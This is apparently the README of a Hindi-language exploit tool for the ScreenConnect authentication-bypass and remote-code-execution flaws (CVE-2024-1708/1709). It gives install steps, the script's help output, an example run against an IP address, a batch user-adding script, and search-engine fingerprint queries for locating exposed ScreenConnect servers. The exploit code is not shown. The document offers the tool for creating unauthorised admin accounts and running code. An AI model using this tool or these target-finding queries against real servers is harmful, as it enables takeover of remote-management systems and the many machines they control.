
ConnectWise ScreenConnect में CVE-2024-1708 और CVE-2024-1709 के लिए एक्सप्लॉइट स्क्रिप्ट, जो प्रमाणीकरण बाईपास और रिमोट कोड निष्पादन को सक्षम करती है, साथ ही उपयोगकर्ता निर्माण और प्रॉक्सी समर्थन के साथ।
मैं Python3.9 का उपयोग कर रहा हूँ
pip install requests
# python check.py
python batchAdduser.py

python ScreenConnect-AuthBypass-RCE.py -h
usage: ScreenConnect-AuthBypass-RCE.py [-h] [-u USERNAME] [-p PASSWORD] -t TARGET [-d DOMAIN] [--proxy PROXY]
CVE-2024-1708 && CVE-2024-1709 --> RCE!!!
optional arguments:
-h, --help show this help message and exit
-u USERNAME, --username USERNAME
username you want to add
-p PASSWORD, --password PASSWORD
password you want to add
-t TARGET, --target TARGET
target url
-d DOMAIN, --domain DOMAIN
Description of domain
--proxy PROXY eg: http://127.0.0.1:8080
उदाहरण के लिए:
python ScreenConnect-AuthBypass-RCE.py -t http://192.168.9.100

जब आपको निम्नलिखित स्थिति का सामना करना पड़े, तो यह इंगित करता है कि साइट को इस स्क्रिप्ट के माध्यम से RCE नहीं किया जा सकता है।

इसके विशिष्ट कारण यहाँ पर पाए जा सकते हैं:

यदि आप एक वैध हस्ताक्षर प्राप्त कर सकते हैं, तो कृपया issues दर्ज करें, बहुत धन्यवाद।
services.modules.http.headers.server:"screenconnect"
app:"ScreenConnect Remote Management Software"
services.http.response.headers:(key: `Server` and value.headers: `ScreenConnect`)
"Server: ScreenConnect"
product.name="ConnectWise ScreenConnect software"
app="ScreenConnect-Remote-Support-Software"
https://www.connectwise.com/company/trust/security-bulletins/connectwise-screenconnect-23.9.8
https://github.com/watchtowrlabs/connectwise-screenconnect_auth-bypass-add-user-poc